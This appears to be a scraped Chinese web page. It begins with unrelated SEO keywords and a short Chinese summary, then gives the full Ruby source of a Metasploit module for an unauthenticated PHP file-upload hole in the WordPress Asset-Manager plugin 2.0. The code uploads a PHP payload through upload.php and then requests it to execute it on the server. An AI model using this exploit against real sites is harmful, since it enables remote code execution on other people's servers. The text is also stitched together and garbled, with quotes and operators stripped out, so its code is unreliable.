精彩的网格布局网站,北京公司注册官网,携程网网站规划建设特点,wordpress小程序二开这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistrib…这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require msf/corerequire msf/core/exploit/php_execlass Metasploit3 Msf::Exploit::RemoteRank ExcellentRankinginclude Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::PhpEXEdef initialize(info {})super(update_info(info,Name WordPress Asset-Manager PHP File Upload Vulnerability,Description %q{This module exploits a vulnerability found in Asset-Manager 2.0 WordPressplugin. By abusing the upload.php file, a malicious user can upload a file to atemp directory without authentication, which results in arbitrary code execution.},Author [Sammy FORGIT, # initial discoveryJames Fitts # metasploit module],License MSF_LICENSE,References [[ OSVDB, 82653 ],[ BID, 53809 ],[ EDB, 18993 ],[ URL, http://www.hack1990.com/ ]],Payload {BadChars \x00,},Platform php,Arch ARCH_PHP,Targets [[ Generic (PHP Payload), { Arch ARCH_PHP, Platform php } ],[ Linux x86, { Arch ARCH_X86, Platform linux } ]],DefaultTarget 0,DisclosureDate May 26 2012))register_options([OptString.new(TARGETURI, [true, The full URI path to WordPress, /wordpress])], self.class)enddef exploituri target_uri.pathuri / if uri[-1,1] ! /peer #{rhost}:#{rport}payload_name #{rand_text_alpha(5)}.phpphp_payload get_write_exec_payload(:unlink_selftrue)data Rex::MIME::Message.newdata.add_part(php_payload, application/octet-stream, nil, form-data; name\Filedata\; filename\#{payload_name}\)post_data data.to_s.gsub(/^\r\n\-\-\_Part\_/, --_Part_)print_status(#{peer} - Uploading payload #{payload_name})res send_request_cgi({method POST,uri #{uri}wp-content/plugins/asset-manager/upload.php,ctype multipart/form-data; boundary#{data.bound},data post_data})if not res or res.code ! 200 or res.body !~ /#{payload_name}/fail_with(Exploit::Failure::UnexpectedReply, #{peer} - Upload failed)endprint_status(#{peer} - Executing payload #{payload_name})res send_request_raw({uri #{uri}wp-content/uploads/assets/temp/#{payload_name},method GET})if res and res.code ! 200fail_with(Exploit::Failure::UnexpectedReply, #{peer} - Execution failed)endendend
